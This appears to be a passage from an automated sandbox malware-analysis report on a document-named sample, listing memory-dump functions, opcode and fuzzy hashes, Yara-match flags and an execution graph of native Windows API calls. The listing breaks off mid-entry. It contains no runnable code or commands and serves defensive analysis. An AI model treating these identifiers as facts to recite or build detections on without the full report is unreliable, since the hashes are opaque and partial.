                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549AD40 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82bf2c8928c979da72fc2339714524e0203ba489c778977f76c35b5347e5f62b
                                        • Instruction ID: 5852dc13ac14c2fa872bb53e90aa53b47b1f1a3158c64df15fc24d3c30523c2e
                                        • Opcode Fuzzy Hash: 82bf2c8928c979da72fc2339714524e0203ba489c778977f76c35b5347e5f62b
                                        • Instruction Fuzzy Hash: 48F0A574D04208EFCB94DFA9D442A9DBBB5EB89310F10C1AAA81997351D6329A52DF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549A458 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 859179f2ae71ce10618c16b60b4d5302f48a70f2cc96c80199b1a0aac531121f
                                        • Instruction ID: 6b6dc0871e052b40713eb1db9a65fdc490c7a5a28ad947cb913f52ac4bea71b3
                                        • Opcode Fuzzy Hash: 859179f2ae71ce10618c16b60b4d5302f48a70f2cc96c80199b1a0aac531121f
                                        • Instruction Fuzzy Hash: ACE01A75908208FBCF04DF95D8469ADBF79FB89310F10C09AED4917351C6329A62EB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05499B68 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e7656c644cdc1f66b2d00c6fe0cf3fbbbcbea5c3a47a53d21cc31878446a491
                                        • Instruction ID: 9b721613ef215f9345baa773240cab113b455f93dd83de1d0f7bcd8b1469e097
                                        • Opcode Fuzzy Hash: 0e7656c644cdc1f66b2d00c6fe0cf3fbbbcbea5c3a47a53d21cc31878446a491
                                        • Instruction Fuzzy Hash: 0BE04F38908208FBCF04DF94D9469ADBF79FB89320F10C19EEC4917351C6329A52DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05498698 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f683abfaa491681ab2267c0dc6702b40fa38810e1a3fab184f12bcc22cdecb9d
                                        • Instruction ID: 61d0325250f724ec894a8084fd787f95679dea2edf2944bf77737fa9e526e767
                                        • Opcode Fuzzy Hash: f683abfaa491681ab2267c0dc6702b40fa38810e1a3fab184f12bcc22cdecb9d
                                        • Instruction Fuzzy Hash: B8E08671404208DFDB04EFB4D8066DD7FFCDB47201F0014AA910997251DE315A009B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549A090 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef13e2fc2089c5e9b0c7f80d399ee4aa3ad21b232816dc5c64595fa5472e28f3
                                        • Instruction ID: 97221e7501eb5ed69b89b573db3cd83875e3cf8694c6b11c0c7f5773bc17bd73
                                        • Opcode Fuzzy Hash: ef13e2fc2089c5e9b0c7f80d399ee4aa3ad21b232816dc5c64595fa5472e28f3
                                        • Instruction Fuzzy Hash: 14E08674908208EBCB04DF94D4469ADBFB5FB45310F10C099DC0517341C6325E53DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549EA48 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d54458ecf951f674f1bdaff1497b143275672443228223c8e03e566b41cf829e
                                        • Instruction ID: 236cd27bf10d1e191a909c79cfa4010f00b604e3d27ef052e24927db9cfe3f6e
                                        • Opcode Fuzzy Hash: d54458ecf951f674f1bdaff1497b143275672443228223c8e03e566b41cf829e
                                        • Instruction Fuzzy Hash: 64E08670A0061DEFCB00FFA5E94095C7BB9FB44304B108698E80897308DF322E00DB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05499A20 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41df6824704ced3601f10829604d71d5b350cf6a6cbe16a625ddfadf26eb2fb3
                                        • Instruction ID: 4d847dba57d040a0627e43ca15549b5e78f47c1ae4345cecc51445e86c5db06c
                                        • Opcode Fuzzy Hash: 41df6824704ced3601f10829604d71d5b350cf6a6cbe16a625ddfadf26eb2fb3
                                        • Instruction Fuzzy Hash: DCE01274908208EBCB08DF94D5435ADBFB9EB46314F5081DDD84917341CA326E43DB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05491558 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81fcc77b512c8a9b3c9fb155705ae08a387f803e2cdf1c7a90b6fbf21fa5d101
                                        • Instruction ID: 48549eb80864c70721844528c73ce641d96d300f1bf3db3ee00065a8bea0c52c
                                        • Opcode Fuzzy Hash: 81fcc77b512c8a9b3c9fb155705ae08a387f803e2cdf1c7a90b6fbf21fa5d101
                                        • Instruction Fuzzy Hash: 43D022A14E8A0053FA080244A8873F47F6CE7CA331F896450F74E08E82DA584483CA25
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549EF48 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                        • Instruction ID: 77137908c04b512a8918503aeadb5df6087135bea18f5c35d1eaec0cf7bf07de
                                        • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                        • Instruction Fuzzy Hash: EFD06C72D00129AB8B10AEA998094EFFE79EB09A50B418166A915AB108D2715A219BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05491568 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3f56aab1ff3f73e1fb6cf035be9bb0cb029ffcb2370d67e2e4219b54745a3b9
                                        • Instruction ID: 94bc58b899ead8a73aa0ae282ce0319b9b7a36e1fe0dbafd3e99122d3d61af3f
                                        • Opcode Fuzzy Hash: f3f56aab1ff3f73e1fb6cf035be9bb0cb029ffcb2370d67e2e4219b54745a3b9
                                        • Instruction Fuzzy Hash: 25C02BB049C70583FB181294740B3B03FAC9787331F402011F34F001538F601041CE2A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0146EFC4 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1414069550.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1460000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e9f1e4fa15ceb5704d49fdb832e97b2add5793c3873de0aaf0dfc9ec0a3ef71
                                        • Instruction ID: 2e33204d73d70de37372a57b11d687c46c232789b00137fbc94f75bf2f3a9f36
                                        • Opcode Fuzzy Hash: 3e9f1e4fa15ceb5704d49fdb832e97b2add5793c3873de0aaf0dfc9ec0a3ef71
                                        • Instruction Fuzzy Hash: 0AA19C32E00216CFCF15DFB5D86059EBBB6FF94304B1481AAE905AB265DB31E90ACB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0549F698 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f91c585fda91267779e8fece3d4cafa6c62576a4101e61c5fe84f25a5c6802a
                                        • Instruction ID: bee499942ec2f0b95f2dcceb40a56a2f7f8478d84497ddf95be4a02dbb0f2445
                                        • Opcode Fuzzy Hash: 7f91c585fda91267779e8fece3d4cafa6c62576a4101e61c5fe84f25a5c6802a
                                        • Instruction Fuzzy Hash: E1D11935920B5ACADB10EB64D890AA9B771FFD5300F20C79AE50A37215FF706AC5CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05491991 Relevance: .2, Instructions: 164COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bdc927272296742ffe7ba35ce1edcadb963a7145565aac7aee9ad0be481a60cc
                                        • Instruction ID: 30b2aacc80ac6664c701c8231420938e81d8ed4bdcf6c7686e8e887323f5f9c7
                                        • Opcode Fuzzy Hash: bdc927272296742ffe7ba35ce1edcadb963a7145565aac7aee9ad0be481a60cc
                                        • Instruction Fuzzy Hash: 9D611D70A116198FEB48EF6AE8416AABBF7BBC8300F14C529D5049B369DF705906CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 054919A0 Relevance: .2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e45da74e454c7c238f401f3d6615b1d9dd1e88ec4d92f0fc8858696fc26d4aa9
                                        • Instruction ID: ec196278e586d105626d076e26cbd0496e3c6311b709509fec16a3222aa88bac
                                        • Opcode Fuzzy Hash: e45da74e454c7c238f401f3d6615b1d9dd1e88ec4d92f0fc8858696fc26d4aa9
                                        • Instruction Fuzzy Hash: 0D611C70A117198FEB08EF6AE8416AABFF7BBC8300F14C529D5049B369DF705905CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05491D28 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4056e4e621bf61f6e6c16323ce69a9e7e056a977f0bc544a3d84c7424b06aecd
                                        • Instruction ID: 16c852581cfade4e2847787f07a0e36101dee2eab79aafb64a766f73671269a9
                                        • Opcode Fuzzy Hash: 4056e4e621bf61f6e6c16323ce69a9e7e056a977f0bc544a3d84c7424b06aecd
                                        • Instruction Fuzzy Hash: A45180B4D016288BEB68CF2AD945799BAF3AFC8200F14C1EAD40DA7264DB711A95CF10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 05491D18 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1416868387.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5490000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 248ee30e170b42dd00d1df48c038593066f106685f949c0e6ea8acd5100e3611
                                        • Instruction ID: 801a19de7b3728d429b65641006da3770b9e80f39af1b5d9a6ddd0ac0970b299
                                        • Opcode Fuzzy Hash: 248ee30e170b42dd00d1df48c038593066f106685f949c0e6ea8acd5100e3611
                                        • Instruction Fuzzy Hash: D6318AB1D016588BEB68CF6BC94578EFAF3AFC8304F54C1AAC40CAA254DB7509868F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:1.3%
                                        Dynamic/Decrypted Code Coverage:4.7%
                                        Signature Coverage:8.1%
                                        Total number of Nodes:148
                                        Total number of Limit Nodes:11
                                        execution_graph 91583 423d23 91584 423d3f 91583->91584 91585 423d67 91584->91585 91586 423d7b 91584->91586 91587 42aef3 NtClose 91585->91587 91593 42aef3 91586->91593 91590 423d70 91587->91590 91589 423d84 91596 42cee3 RtlAllocateHeap 91589->91596 91592 423d8f 91594 42af0d 91593->91594 91595 42af1e NtClose 91594->91595 91595->91589 91596->91592 91597 42dea3 91598 42deb3 91597->91598 91599 42deb9 91597->91599 91602 42cea3 91599->91602 91601 42dedf 91605 42b203 91602->91605 91604 42cebe 91604->91601 91606 42b21d 91605->91606 91607 42b22e RtlAllocateHeap 91606->91607 91607->91604 91626 42a533 91627 42a54d 91626->91627 91630 1762df0 LdrInitializeThunk 91627->91630 91628 42a575 91630->91628 91631 427893 91632 4278f0 91631->91632 91633 427927 91632->91633 91636 423763 91632->91636 91635 427909 91642 42376d 91636->91642 91637 42372d 91637->91635 91638 4238f3 91640 42aef3 NtClose 91638->91640 91639 423908 91641 42aef3 NtClose 91639->91641 91643 4238fc 91640->91643 91645 423911 91641->91645 91642->91637 91642->91638 91642->91639 91643->91635 91644 42393d 91644->91635 91645->91644 91648 42cdc3 91645->91648 91651 42b253 91648->91651 91650 423931 91650->91635 91652 42b270 91651->91652 91653 42b281 RtlFreeHeap 91652->91653 91653->91650 91654 4240b3 91658 4240c2 91654->91658 91655 424106 91656 42cdc3 RtlFreeHeap 91655->91656 91657 424116 91656->91657 91658->91655 91659 424147 91658->91659 91661 42414c 91658->91661 91660 42cdc3 RtlFreeHeap 91659->91660 91660->91661 91608 4139e3 91609 4139e7 91608->91609 91614 417393 91609->91614 91611 413a1a 91612 413a66 91611->91612 91613 413a53 PostThreadMessageW 91611->91613 91613->91612 91616 4173b7 91614->91616 91615 4173be 91615->91611 91616->91615 91617 4173f3 LdrLoadDll 91616->91617 91618 41740a 91616->91618 91617->91618 91618->91611 91619 41a9e3 91620 41aa27 91619->91620 91621 42aef3 NtClose 91620->91621 91622 41aa48 91620->91622 91621->91622 91662 41daf3 91663 41db19 91662->91663 91667 41dc07 91663->91667 91668 42dfd3 91663->91668 91665 41dbab 91665->91667 91674 42a583 91665->91674 91669 42df43 91668->91669 91670 42dfa0 91669->91670 91671 42cea3 RtlAllocateHeap 91669->91671 91670->91665 91672 42df7d 91671->91672 91673 42cdc3 RtlFreeHeap 91672->91673 91673->91670 91675 42a59d 91674->91675 91678 1762c0a 91675->91678 91676 42a5c9 91676->91667 91679 1762c11 91678->91679 91680 1762c1f LdrInitializeThunk 91678->91680 91679->91676 91680->91676 91681 1762b60 LdrInitializeThunk 91623 418588 91624 42aef3 NtClose 91623->91624 91625 418592 91624->91625 91682 401ada 91683 401af6 91682->91683 91686 42e363 91683->91686 91689 42c9b3 91686->91689 91690 42c9d9 91689->91690 91701 407413 91690->91701 91692 42c9ef 91700 401b78 91692->91700 91704 41a7f3 91692->91704 91694 42ca23 91715 426fd3 91694->91715 91695 42ca0e 91695->91694 91719 42b2a3 91695->91719 91698 42ca32 91699 42b2a3 ExitProcess 91698->91699 91699->91700 91722 4160c3 91701->91722 91703 407420 91703->91692 91705 41a81f 91704->91705 91733 41a6e3 91705->91733 91708 41a864 91710 41a880 91708->91710 91713 42aef3 NtClose 91708->91713 91709 41a84c 91711 41a857 91709->91711 91712 42aef3 NtClose 91709->91712 91710->91695 91711->91695 91712->91711 91714 41a876 91713->91714 91714->91695 91716 42702d 91715->91716 91718 42703a 91716->91718 91744 417ee3 91716->91744 91718->91698 91720 42b2c0 91719->91720 91721 42b2cd ExitProcess 91720->91721 91721->91694 91723 4160da 91722->91723 91725 4160f3 91723->91725 91726 42b933 91723->91726 91725->91703 91728 42b94b 91726->91728 91727 42b96f 91727->91725 91728->91727 91729 42a583 LdrInitializeThunk 91728->91729 91730 42b9c4 91729->91730 91731 42cdc3 RtlFreeHeap 91730->91731 91732 42b9dd 91731->91732 91732->91725 91734 41a6fd 91733->91734 91738 41a7d9 91733->91738 91739 42a623 91734->91739 91737 42aef3 NtClose 91737->91738 91738->91708 91738->91709 91740 42a63d 91739->91740 91743 17635c0 LdrInitializeThunk 91740->91743 91741 41a7cd 91741->91737 91743->91741 91745 417f0d 91744->91745 91751 41836b 91745->91751 91752 413b13 91745->91752 91747 41800e 91748 42cdc3 RtlFreeHeap 91747->91748 91747->91751 91749 418026 91748->91749 91750 42b2a3 ExitProcess 91749->91750 91749->91751 91750->91751 91751->91718 91754 413b32 91752->91754 91753 413c50 91753->91747 91754->91753 91756 413563 91754->91756 91757 413585 91756->91757 91759 42b163 91756->91759 91757->91753 91760 42b17d 91759->91760 91763 1762c70 LdrInitializeThunk 91760->91763 91761 42b1a5 91761->91757 91763->91761

                                        Executed Functions

                                        Function 00417393 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 81 417393-4173bc call 42dac3 84 4173c2-4173d0 call 42dfe3 81->84 85 4173be-4173c1 81->85 88 4173e0-4173f1 call 42c483 84->88 89 4173d2-4173dd call 42e283 84->89 94 4173f3-417407 LdrLoadDll 88->94 95 41740a-41740d 88->95 89->88 94->95
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417405
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                        • Instruction ID: e28705531d0a71a47275eb6256db526e1c4a12de9ccf060b1b54dc333d4af527
                                        • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                        • Instruction Fuzzy Hash: 66015EB1E0020DABDB10DBA1DC42FDEB7B89B54308F00419AED0897240F634EB54CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0042AEF3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 101 42aef3-42af2c call 404a83 call 42bf93 NtClose
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 185affe5397ec2be03daad944446bfef41dc645ac842470fdc446d53086dad78
                                        • Instruction ID: 9755b8513a4a0532267d534b105fcccf1e75c854b9f226466bfca0320b798052
                                        • Opcode Fuzzy Hash: 185affe5397ec2be03daad944446bfef41dc645ac842470fdc446d53086dad78
                                        • Instruction Fuzzy Hash: C1E086723406147BD610EA5AEC01F9B776DDFC5714F418419FB08A7145C771791487F8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 115 1762b60-1762b6c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                        • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                        • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                        • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 117 1762df0-1762dfc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                        • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                        • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                        • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 116 1762c70-1762c7c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                        • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                        • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                        • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                        • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                        • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                        • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004139DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 00413A60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 4f6ee6a2aa75e39806ed05b78996169da1e074e328cf94732a5473f98b75b685
                                        • Instruction ID: 1705c92397b7728e6a7069ae2afc72bb02d5e803b55ed4ab40403dabe5f54253
                                        • Opcode Fuzzy Hash: 4f6ee6a2aa75e39806ed05b78996169da1e074e328cf94732a5473f98b75b685
                                        • Instruction Fuzzy Hash: 9911C272E4421876DB209AA19C42FEE7B789F41B94F114069FA147A280D6B8570687EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413999 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • PostThreadMessageW.USER32(F-385HLwx,00000111,00000000,00000000), ref: 00413A60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_Doc 1Z881A080453968203.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: F-385HLwx$F-385HLwx
                                        • API String ID: 1836367815-2050541360
                                        • Opcode ID: 9cbb267e30871227f462935926d260e06d4b543328b958780f7df8333f3dd4a9
                                        • Instruction ID: 27e5d43c5606cfd1c9c7ca44b44d24ecb50685800f779b65e461dd2e142409f5
                                        • Opcode Fuzzy Hash: 9cbb267e30871227f462935926d260e06d4b543328b958780f7df8333f3dd4a9
